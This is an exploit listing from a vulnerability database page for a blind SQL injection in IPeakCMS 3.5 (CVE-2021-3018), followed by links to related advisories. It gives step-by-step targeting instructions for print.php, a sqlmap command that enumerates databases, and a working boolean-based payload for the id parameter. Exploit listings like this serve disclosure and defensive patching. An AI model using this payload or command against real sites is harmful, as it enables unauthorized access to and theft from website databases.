Lucene search
MoeAlBarbariPACKETSTORM:160815HistoryJan 06, 2021 - 12:00 a.m.
IPeakCMS 3.5 SQL Injection
2021-01-0600:00:00
MoeAlBarbari
packetstormsecurity.com
176
0.013 Low
EPSS
Percentile
86.2%
`# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage: https://ipeak.ch/
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))
`
Related
cve
cve
CVE-2021-3018
2021-01-05 05:15:10
prion
prion
Sql injection
2021-01-05 05:15:00
cvelist
cvelist
CVE-2021-3018
2021-01-05 04:37:24
checkpoint_advisories
checkpoint_advisories
Ipeak Infosystems IbexwebCMS SQL Injection (CVE-2021-3018)
2021-02-16 00:00:00
nvd
nvd
CVE-2021-3018
2021-01-05 05:15:10
exploitdb
exploitdb
IPeakCMS 3.5 - Boolean-based blind SQLi
2021-01-06 00:00:00